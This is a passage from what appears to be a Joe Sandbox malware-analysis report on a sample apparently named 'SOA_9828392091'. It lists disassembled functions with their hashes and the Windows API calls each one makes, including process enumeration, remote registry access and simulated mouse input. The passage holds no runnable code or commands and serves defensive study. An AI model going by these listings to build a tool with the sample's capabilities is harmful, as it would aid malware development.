                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 2a3788fa3d8656784a00d954f73f3d7b7fe75a7cc9cb7783b52cb6fa8a52b1d3
                                      • Instruction ID: 1af74ec2103e04b2e9ff18090a0d3a948d5bc90c86acba571096c70335e1e72c
                                      • Opcode Fuzzy Hash: 2a3788fa3d8656784a00d954f73f3d7b7fe75a7cc9cb7783b52cb6fa8a52b1d3
                                      • Instruction Fuzzy Hash: 97216276215204AF9B149BACDD89DAB77ECEF49360B00C125F90DCB2A1E674EC419764
                                      APIs
                                        • Part of subcall function 0094D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                        • Part of subcall function 0094D17C: GetStockObject.GDI32(00000011), ref: 0094D1CE
                                        • Part of subcall function 0094D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0099A32D
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0099A33A
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0099A345
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0099A354
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0099A360
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: 94be7eb6d75b4c50dafba0d9510914b2d73e4221ae4b469d17d02d36b9fb4f12
                                      • Instruction ID: af04cf38d639dae8464d8158d6bc8d84cc6dbd8e4dc10b2800df64239770075d
                                      • Opcode Fuzzy Hash: 94be7eb6d75b4c50dafba0d9510914b2d73e4221ae4b469d17d02d36b9fb4f12
                                      • Instruction Fuzzy Hash: E71190B1150219BEEF159F65CC86EEB7F6DFF08798F014114BA08A60A0C6729C21DBA4
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 0094CCF6
                                      • GetWindowRect.USER32(?,?), ref: 0094CD37
                                      • ScreenToClient.USER32(?,?), ref: 0094CD5F
                                      • GetClientRect.USER32(?,?), ref: 0094CE8C
                                      • GetWindowRect.USER32(?,?), ref: 0094CEA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$Screen
                                      • String ID:
                                      • API String ID: 1296646539-0
                                      • Opcode ID: 2f4973443e2263d9967c070903c72dd4753ad65b62928ead1ba929ac02c7c5ba
                                      • Instruction ID: 17dc908cadd3c4abccffd324b5f281d0c28eed670587313ccfc1a0a0dcc491c2
                                      • Opcode Fuzzy Hash: 2f4973443e2263d9967c070903c72dd4753ad65b62928ead1ba929ac02c7c5ba
                                      • Instruction Fuzzy Hash: A5B13AB990124ADFDB50CFA8C580BEEB7B5FF08310F149529EC59AB250EB34AD50DB64
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00991C18
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00991C26
                                      • __wsplitpath.LIBCMT ref: 00991C54
                                        • Part of subcall function 00951DFC: __wsplitpath_helper.LIBCMT ref: 00951E3C
                                      • _wcscat.LIBCMT ref: 00991C69
                                      • Process32NextW.KERNEL32(00000000,?), ref: 00991CDF
                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00991CF1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID:
                                      • API String ID: 1380811348-0
                                      • Opcode ID: 86ad69aa61a50f5ae069d5969252b689d4f0684bf1a67582a7aed59bc8c3fb14
                                      • Instruction ID: 6f47949c24eecbcd22a466368518827a9659125b9efe022b2612c192084c1073
                                      • Opcode Fuzzy Hash: 86ad69aa61a50f5ae069d5969252b689d4f0684bf1a67582a7aed59bc8c3fb14
                                      • Instruction Fuzzy Hash: D0513CB15083419FD724EF24D885FABB7ECEF88754F00491EF58597291EB709904CB92
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009930AF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009930EF
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00993112
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0099313B
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0099317E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0099318B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 3451389628-0
                                      • Opcode ID: ed43f48d21aa0af46c78a3fe46bb07aba0b10fbf0de4cc20682140a17ff4b2aa
                                      • Instruction ID: 2e82fcaadd88ea8d7cd97123dfa25fb78c37f98a6a7b4adc240e4cb29eb21bbb
                                      • Opcode Fuzzy Hash: ed43f48d21aa0af46c78a3fe46bb07aba0b10fbf0de4cc20682140a17ff4b2aa
                                      • Instruction Fuzzy Hash: DB514871108300AFCB14EF68C895E6ABBF9FF89310F04891DF556972A1DB71EA05CB52
                                      APIs
                                      • GetMenu.USER32(?), ref: 00998540
                                      • GetMenuItemCount.USER32(00000000), ref: 00998577
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0099859F
                                      • GetMenuItemID.USER32(?,?), ref: 0099860E
                                      • GetSubMenu.USER32(?,?), ref: 0099861C
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0099866D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: 75a22c4e10bf1bd8f45abc2269df3f1ec54bf2c63681d9d3c6bedf3985e85dd0
                                      • Instruction ID: e9b302e7cbe1f096007f03c8e8426c9d821ea75d0ea4bde0b0899d4188e1d778
                                      • Opcode Fuzzy Hash: 75a22c4e10bf1bd8f45abc2269df3f1ec54bf2c63681d9d3c6bedf3985e85dd0
                                      • Instruction Fuzzy Hash: 53519F71A00215AFCF11EF68C945AAEB7F4EF89310F1144A9F906BB351DB70AE418B91
                                      APIs
                                      • _memset.LIBCMT ref: 00974B10
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00974B5B
                                      • IsMenu.USER32(00000000), ref: 00974B7B
                                      • CreatePopupMenu.USER32 ref: 00974BAF
                                      • GetMenuItemCount.USER32(000000FF), ref: 00974C0D
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00974C3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: 57abab007bdf0a4251cf513bfae7abc5de0a7d5f6aeec36cec0bb02b018968fe
                                      • Instruction ID: 9972a3cc97db4a760bad9d7749694102fcfdfc958a246019a7ff39ddeaec03e9
                                      • Opcode Fuzzy Hash: 57abab007bdf0a4251cf513bfae7abc5de0a7d5f6aeec36cec0bb02b018968fe
                                      • Instruction Fuzzy Hash: F851C171601209DBDF25CF64C988BEDBBF8AF44314F188159E4599B292E3B09D44CB51
                                      APIs
                                        • Part of subcall function 0094B34E: GetWindowLongW.USER32(?,000000EB), ref: 0094B35F
                                      • BeginPaint.USER32(?,?,?), ref: 0094AC2A
                                      • GetWindowRect.USER32(?,?), ref: 0094AC8E
                                      • ScreenToClient.USER32(?,?), ref: 0094ACAB
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0094ACBC
                                      • EndPaint.USER32(?,?,?,?,?), ref: 0094AD06
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009AE673
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 2592858361-0
                                      • Opcode ID: 1093f02f46ceddf56592bd9c1f16ecb105722d129d9dd41e475f564b3a58eba8
                                      • Instruction ID: ff37ecbf5d3472f81d31d96d99da380cfdf6fae0c5219479094d44b1ad51d65f
                                      • Opcode Fuzzy Hash: 1093f02f46ceddf56592bd9c1f16ecb105722d129d9dd41e475f564b3a58eba8
                                      • Instruction Fuzzy Hash: 8441B071109301DFC710DF24CC84FBA7BA8EB59331F040669F9A4872E1D7319845EBA2
                                      APIs
                                      • ShowWindow.USER32(009F1628,00000000,009F1628,00000000,00000000,009F1628,?,009ADC5D,00000000,?,00000000,00000000,00000000,?,009ADAD1,00000004), ref: 0099E40B
                                      • EnableWindow.USER32(00000000,00000000), ref: 0099E42F
                                      • ShowWindow.USER32(009F1628,00000000), ref: 0099E48F
                                      • ShowWindow.USER32(00000000,00000004), ref: 0099E4A1
                                      • EnableWindow.USER32(00000000,00000001), ref: 0099E4C5
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0099E4E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: 4660e2151cf0e78810aee9623a73fc0b7dbd443655785a768af4c16d17dfdf89
                                      • Instruction ID: 9e686f36e9eba7742b10c6178b42f8dd96a885331f159a2377076fe9023a42c1
                                      • Opcode Fuzzy Hash: 4660e2151cf0e78810aee9623a73fc0b7dbd443655785a768af4c16d17dfdf89
                                      • Instruction Fuzzy Hash: 93416D34605141EFDF22CF28C599B947BE5BF09714F1881A9EA588F2B2C732E842CB61
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 009798D1
                                        • Part of subcall function 0094F4EA: std::exception::exception.LIBCMT ref: 0094F51E
                                        • Part of subcall function 0094F4EA: __CxxThrowException@8.LIBCMT ref: 0094F533
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00979908
                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00979924
                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0097999E
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009799B3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 009799D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 2537439066-0
                                      • Opcode ID: 67e9c710247f655e88bef4b2ada516b81d3d1451d99e3dcbf248e2510fb79ee2
                                      • Instruction ID: 2133f195eef4190e1ffb23ced0160e7b3d2e988356e44bb6c69b3e734aed8d23
                                      • Opcode Fuzzy Hash: 67e9c710247f655e88bef4b2ada516b81d3d1451d99e3dcbf248e2510fb79ee2
                                      • Instruction Fuzzy Hash: AF315032A00105EBDB109FA4DD85E6BB778FF85310B1481B9F904AB256DB70DE10DBA0
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,009877F4,?,?,00000000,00000001), ref: 00989B53
                                        • Part of subcall function 00986544: GetWindowRect.USER32(?,?), ref: 00986557
                                      • GetDesktopWindow.USER32 ref: 00989B7D
                                      • GetWindowRect.USER32(00000000), ref: 00989B84
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00989BB6
                                        • Part of subcall function 00977A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      • GetCursorPos.USER32(?), ref: 00989BE2
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00989C44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: 3e2e13449935b4fa85552aa2ab05f28889ccd1bc3f12fa119b5d9f4c0bb65702
                                      • Instruction ID: ad5000d0024efab76c4d969cd84418429194851e5834810c69cd47fa10c5c3dd
                                      • Opcode Fuzzy Hash: 3e2e13449935b4fa85552aa2ab05f28889ccd1bc3f12fa119b5d9f4c0bb65702
                                      • Instruction Fuzzy Hash: 6D31C372108305AFD710DF54D849F9AB7EDFF85314F040A29F589D7281E671EA04CB91
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                        • Part of subcall function 0094C6F4: _wcscpy.LIBCMT ref: 0094C717
                                      • _wcstok.LIBCMT ref: 0098184E
                                      • _wcscpy.LIBCMT ref: 009818DD
                                      • _memset.LIBCMT ref: 00981910
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: f4852d9a72e6e588634767ac50f6631534b320145d987470e8dea353b9a964bf
                                      • Instruction ID: ecab4f37b5b16e973b5fccdf74a26fce87e2772d7f98fea24d54278bc7f21f38
                                      • Opcode Fuzzy Hash: f4852d9a72e6e588634767ac50f6631534b320145d987470e8dea353b9a964bf
                                      • Instruction Fuzzy Hash: D4C15A716083419FC724EF64C895B9AB7E8AF85350F00492DF89A973A2DB30ED05CF82
                                      APIs
                                        • Part of subcall function 0094AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0094AFE3
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094AFF2
                                        • Part of subcall function 0094AF83: BeginPath.GDI32(?), ref: 0094B009
                                        • Part of subcall function 0094AF83: SelectObject.GDI32(?,00000000), ref: 0094B033
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0099EC20
                                      • LineTo.GDI32(00000000,00000003,?), ref: 0099EC34
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0099EC42
                                      • LineTo.GDI32(00000000,00000000,?), ref: 0099EC52
                                      • EndPath.GDI32(00000000), ref: 0099EC62
                                      • StrokePath.GDI32(00000000), ref: 0099EC72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 7ac8b65cb70fdb719a270948b1477c4ee40ee9d39aa3b4fe58d4ecfdb68e7840
                                      • Instruction ID: 788420f74779e24cfdbc4d192db9cc35629f94e5ea3450bf80de5505ab04a4bd
                                      • Opcode Fuzzy Hash: 7ac8b65cb70fdb719a270948b1477c4ee40ee9d39aa3b4fe58d4ecfdb68e7840
                                      • Instruction Fuzzy Hash: BA110972005149BFEF029F94DD88EEA7F6DEB08360F048112FE4899160E7719D55EBA0
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0096E1C0
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0096E1D1
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0096E1D8
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0096E1E0
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0096E1F7
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0096E209
                                        • Part of subcall function 00969AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00969A05,00000000,00000000,?,00969DDB), ref: 0096A53A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                      • String ID:
                                      • API String ID: 603618608-0
                                      • Opcode ID: 9b4a406174823ac9ba701ac0ae853a26b48c7e79d67755d7f9301f3d004e4ab5
                                      • Instruction ID: 8d6c2f7a42c211ffae151312768c2232ac27a9287b1fc1909711d390b5f976b2
                                      • Opcode Fuzzy Hash: 9b4a406174823ac9ba701ac0ae853a26b48c7e79d67755d7f9301f3d004e4ab5
                                      • Instruction Fuzzy Hash: 40018FB9A04214BFEB109BA68D45B5EBFB8EB48761F004166EE04A7290E6709C00DFA0
                                      APIs
                                      • __init_pointers.LIBCMT ref: 00957B47
                                        • Part of subcall function 0095123A: __initp_misc_winsig.LIBCMT ref: 0095125E
                                        • Part of subcall function 0095123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00957F51
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00957F65
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00957F78
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00957F8B
                                        • Part of subcall function 0095123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00957F9E
